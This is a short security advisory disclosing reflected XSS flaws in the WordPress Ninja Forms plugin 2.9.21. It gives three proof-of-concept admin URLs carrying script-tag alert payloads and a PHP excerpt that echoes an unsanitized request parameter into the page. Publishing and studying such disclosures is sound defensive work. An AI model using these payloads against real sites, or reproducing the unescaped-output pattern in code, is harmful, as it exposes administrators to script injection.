Title: WordPress 'Ninja Forms' Plugin - XSS
Version: 2.9.21
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/07/14
Download: https://wordpress.org/plugins/ninja-forms/
Contacted authors: 2015/07/14
==========================================================

## Description: 
==========================================================
Forms created with a simple drag and drop interface. Contact forms, Email collection forms, or any other form you want on your WordPress site.

## Reflected XSS:
==========================================================
Certain parameters are used unsanitized in the admin pages. 

PoC:
Log in as admin and visit one of the following URLs:


[URL]/wp-admin/admin.php?page=nf-processing&title=<script>alert(123);</script>
[URL]/wp-admin/admin.php?page=nf-processing&action=</script><script>alert(123);</script>
[URL]/wp-admin/admin.php?page=ninja-forms&tab=notifications&form_id=7&id="><script>alert(132);</script>&notification-action=new

It looks like there are more vulnerabilities, since the plugin has code like this:

file: subs-cpt.php
 ...
l.883 if ( isset ( $_REQUEST['ref'] ) ) {
l.884 	$ref = $_REQUEST['ref'];
l.885 } else if ( get_transient( 'nf_sub_edit_ref' ) ) {
l.886 	$ref = get_transient( 'nf_sub_edit_ref' );
l.887 } else {
l.888 	$ref = '';
l.889 }
l.890 ?>
l.891 <input type="hidden" name="ref" value="<?php echo $ref; ?>" />
 ...


## Solution
==========================================================
No fix available.